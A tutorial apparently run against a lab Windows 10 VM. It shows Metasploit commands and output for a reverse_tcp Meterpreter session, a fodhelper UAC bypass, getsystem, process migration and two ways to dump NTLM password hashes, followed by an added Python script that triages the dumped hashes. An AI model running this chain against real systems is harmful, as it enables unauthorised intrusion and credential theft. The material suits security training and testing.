Meterpreter hash dump with Windows 10

So let’s assume you have been able to gain access to the target machine. In this instance I have access with Meterpreter, as detailed in the previous tutorial. We then bypass UAC to elevate our privileges.

$ msfconsole
msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set LHOST 10.0.2.15
msf6 > set LPORT 4444
msf6 > exploit
meterpreter > getuid
meterpreter > getsystem

When we run the above, you will find that getsystem fails:

meterpreter > getsystem
[-] 2001: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > 
setting up meterpreter session

To elevate to SYSTEM privileges we will bypass UAC.

First, we background our active session:

meterpreter > background

and then use the bypassuac_fodhelper module:

msf6 > use exploit/windows/local/bypassuac_fodhelper
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set session 1
msf6 > set LHOST 10.0.2.4
msf6 > set LPORT 1234
msf6 > exploit

We will now be back in an active session and able to run getsystem successfully to elevate to full SYSTEM privileges.

getsystem and bypassuac with fodhelper

Now we are ready to steal some hashes! Let’s see what happens when we run hashdump.

hashdump operation failed: The parameter is incorrect

It still fails:

meterpreter > hashdump
[-] 2007: Operation failed: The parameter is incorrect.

What can we do to fix this and get some hashes? Well, we need to migrate to a process that is running as SYSTEM. Let’s take a look at the running processes using the ps command:

meterpreter > ps

We get a list of all running processes and need to identify one that is running as the SYSTEM user.

list of processes running on target machine

We will use the migrate command to attach to this process.

meterpreter > migrate 248
[*] Migrating from 7720 to 248...
[*] Migration completed successfully.
meterpreter > 

Once we have migrated to this process we run hashdump again, and this time we get a result!

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IEUser:1000:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
sshd:1002:aad3b435b51404eeaad3b435b51404ee:475a7dd05810c001c892853b88ba03a9:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:f27c0c12a5c94e851d73b4ce3a77d149:::
meterpreter > 

METHOD 2

There is another way to get a hashdump, using a Metasploit post module. Once you have control over the session with elevated permissions, background the session and switch to the new module.

meterpreter > background
msf6 > use windows/gather/hashdump
msf6 > set SESSION 2
msf6 > run

Here we switch Metasploit to the windows/gather/hashdump post module, attach it to our elevated session and run it. When we do this we again get a readout of the password hashes:

msf6 post(windows/gather/hashdump) > set SESSION 2
msf6 post(windows/gather/hashdump) > run

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 5062b47b183427f814c3cbdad04994e6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:f27c0c12a5c94e851d73b4ce3a77d149:::
IEUser:1000:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
sshd:1002:aad3b435b51404eeaad3b435b51404ee:475a7dd05810c001c892853b88ba03a9:::


[*] Post module execution completed

This can also locate password hints if available.

hashdump using the metasploit windows/gather/hashdump exploit

Now we can copy and paste these into a text file on our system for cracking.
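Before the hashes go anywhere, it is worth reading what the two hashdump outputs above already tell us. The following Python triage script is an added example and not part of the original post or of Metasploit: it parses the pwdump-style lines (user:RID:LM:NT:::) as pasted straight from the console, skips the status lines, and flags blank passwords, LM hashes still being stored, and accounts that share one NT hash, which means the same password is reused. The two empty-password hash constants are the well-known values for an empty string; the sample input is the output shown above.

```python
import re
from collections import defaultdict

# Well-known values hashdump prints for an empty password. Modern Windows no longer
# stores LM hashes, so every account shows the empty LM value regardless of password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# pwdump format: user:RID:LM hash:NT hash:::
HASH_LINE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

# Sample input: the post module output shown above, including a status line
# that a straight copy-paste of the console would carry along.
SAMPLE = """[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:f27c0c12a5c94e851d73b4ce3a77d149:::
IEUser:1000:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
sshd:1002:aad3b435b51404eeaad3b435b51404ee:475a7dd05810c001c892853b88ba03a9:::
"""


def parse_hashdump(text):
    """Return one dict per well-formed hash line; any other line is skipped."""
    entries = []
    for line in text.splitlines():
        m = HASH_LINE.match(line.strip())
        if m:
            user, rid, lm, nt = m.groups()
            entries.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return entries


def triage(entries):
    """Flag blank passwords, stored LM hashes and NT hashes shared by several accounts."""
    by_nt = defaultdict(list)
    for e in entries:
        by_nt[e["nt"]].append(e["user"])
    return {
        "empty_password": [e["user"] for e in entries if e["nt"] == EMPTY_NT],
        "lm_stored": [e["user"] for e in entries if e["lm"] != EMPTY_LM],
        "shared_nt": {h: sorted(u) for h, u in by_nt.items() if len(u) > 1 and h != EMPTY_NT},
    }


if __name__ == "__main__":
    for finding, users in triage(parse_hashdump(SAMPLE)).items():
        print(f"{finding}: {users}")
```

On the output above this reports Guest and DefaultAccount with blank passwords, no LM hashes stored, and Administrator and IEUser sharing the same NT hash, which is the password reuse finding that belongs in the report.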
